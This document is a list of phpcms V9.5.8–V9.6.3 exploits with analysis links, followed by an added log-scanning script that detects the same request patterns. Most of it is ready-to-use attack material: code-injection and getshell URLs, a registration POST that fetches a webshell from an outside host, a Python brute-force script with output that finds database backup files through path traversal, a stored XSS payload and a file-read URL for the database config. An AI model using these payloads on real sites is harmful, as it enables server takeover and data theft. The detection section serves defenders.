phpcms V9.5.8 backend getshell:
payload: http://127.0.0.1/index.php?m=content&c=content&a=public_categorys&menuid=${@phpinfo()}
Analysis article: https://www.mrwu.red/web/2723.html
phpcms v9.6.0 arbitrary user password reset:
Analysis article: https://www.cnblogs.com/yangxiaodi/p/6890298.html
phpcms V9.6.0 frontend getshell:
Visit the URL:
http://127.0.0.1.com/index.php?m=member&c=index&a=register&siteid=1
POST data:
siteid=1&modelid=11&username=123456&password=123456&email=123456@qq.com&info[content]=<img src=http://files.hackersb.cn/webshell/antSword-shells/php_assert.php#.jpg>&dosubmit=1&protocol=
webshell address: it shows up in the response page~
Analysis article: https://xz.aliyun.com/t/5730
phpcms V9.6.0 database backup filename brute force:
Exploit code is as follows:
#!/usr/bin/env python
# coding=utf-8
'''/*
* author = Mochazz
* team = Hongri Security Team (红日安全团队)
* env = python3
*
*/
'''
import requests
import itertools

# character set the backup filename is assumed to be built from
characters = "abcdefghjklmnopqrstuvwxyz0123456789_!#"
backup_sql = ""
# font= is resolved relative to the caches/bakup/default directory; a 200 response
# containing PNG data means the file name prefix given in {location} exists
payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<"
url = "http://127.0.0.1"
flag = 0

# stage 1: find a prefix of 1..6 characters (permutations of distinct characters,
# so a prefix with a repeated character such as "11" is never tried)
for num in range(1, 7):
    if flag:
        break
    for pre in itertools.permutations(characters, num):
        pre = ''.join(list(pre))
        payload = payload.format(location=pre)
        r = requests.get(url + payload)
        if r.status_code == 200 and "PNG" in r.text:
            flag = 1
            backup_sql = pre
            payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<"
            break
        else:
            payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<"
print("[+] 前缀为:", backup_sql)

# stage 2: extend the prefix one character at a time (up to 30 more characters);
# reaching the last character of the set without a hit ends the search
flag = 0
for i in range(30):
    if flag:
        break
    for ch in characters:
        if ch == characters[-1]:
            flag = 1
            break
        payload = payload.format(location=backup_sql + ch)
        r = requests.get(url + payload)
        if r.status_code == 200 and "PNG" in r.text:
            backup_sql += ch
            print("[+] ", backup_sql)
            payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<"
            break
        else:
            payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<"
print("备份sql文件地址为:", backup_sql + ".sql")
Output:
C:\Users\dell\Desktop>python Zxc.py
[+] 前缀为: 1
[+] 12
[+] 123
[+] 1231
[+] 12312
[+] 123123
[+] 1231231
[+] 12312312
[+] 123123123
备份sql文件地址为: 123123123.sql
Analysis article:
phpcms V9.6.0 authkey leak leading to injection:
http://127.0.0.1/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
phpcms V9.6.1 arbitrary file read:
Analysis article: https://xz.aliyun.com/t/5731
phpcms V9.6.2 frontend SQL injection:
Analysis article: https://xz.aliyun.com/t/5731
phpcms V9.6.3 stored XSS:
Exploitation: first register an account, log in, then visit:
http://127.0.0.1/index.php?m=member&c=index&a=change_credit&
POST:
dosubmit=1&fromvalue=0.6&from=1id=1`setset'&to=}" onmousemove=alert(1)>//
Analysis article: https://xz.aliyun.com/t/1860
phpcms V9.6.3 file inclusion:
http://127.0.0.1.com/m=search&a=public_get_suggest_keyword&q=../../phpsso_server/caches/configs/database.php
If the vulnerability exists, phpcms's database configuration file is read successfully.
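As an added detection example (not from the original page or any of the linked write-ups): the URL-borne patterns listed above (menuid code injection, the api.php creatimg font= traversal that the backup brute force loops over, the get_menu cachefile= traversal and the public_get_suggest_keyword q= file read) turned into access-log rules and run over constructed sample log lines; the log format, IPs and rule names are assumptions.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access log (combined-log style, not real traffic): one client walks the
# backup-name brute force one character at a time; the last line is ordinary browsing.
LOG = r"""
203.0.113.5 - - [10/Oct/2020:13:55:36 +0000] "GET /index.php?m=content&c=content&a=public_categorys&menuid=${@phpinfo()} HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2020:13:55:40 +0000] "GET /api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/1<< HTTP/1.1" 200 300
203.0.113.5 - - [10/Oct/2020:13:55:41 +0000] "GET /api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/12<< HTTP/1.1" 200 300
198.51.100.7 - - [10/Oct/2020:13:56:02 +0000] "GET /index.php?m=search&a=public_get_suggest_keyword&q=../../phpsso_server/caches/configs/database.php HTTP/1.1" 200 2048
198.51.100.7 - - [10/Oct/2020:13:56:10 +0000] "GET /api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin HTTP/1.1" 200 900
192.0.2.9 - - [10/Oct/2020:13:57:00 +0000] "GET /index.php?m=content&c=index&a=lists&catid=6 HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
TRAVERSAL = re.compile(r'\.\./|\.\.\\')  # "../" or "..\" anywhere in a parameter value

def parse_request(line):
    """Split one log line into ip, method, path, status and decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, target, status = m.groups()
    url = urlparse(target)
    params = {k: v[0] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    return {"ip": ip, "method": method, "path": url.path, "params": params, "status": int(status)}

def classify(req):
    """Names of the phpcms request patterns from the list above that this request matches."""
    p, path, hits = req["params"], req["path"], []
    if path.endswith("index.php") and p.get("c") == "content" and "${" in p.get("menuid", ""):
        hits.append("menuid-code-injection")        # ${...} passed in menuid
    if path.endswith("api.php") and p.get("op") == "creatimg" and TRAVERSAL.search(p.get("font", "")):
        hits.append("creatimg-font-traversal")      # font= pointed at caches/bakup
    if path.endswith("api.php") and p.get("op") == "get_menu" and TRAVERSAL.search(p.get("cachefile", "")):
        hits.append("get_menu-cachefile-traversal") # cachefile= escaping the cache dir
    if p.get("a") == "public_get_suggest_keyword" and TRAVERSAL.search(p.get("q", "")):
        hits.append("suggest_keyword-file-read")    # q= used as an include path
    return hits

def scan(log_text):
    """(ip, path, rule) per matching request, in log order; repeated creatimg hits from one ip is the brute force."""
    alerts = []
    for line in log_text.splitlines():
        req = parse_request(line)
        if req is None:
            continue
        for rule in classify(req):
            alerts.append((req["ip"], req["path"], rule))
    return alerts
```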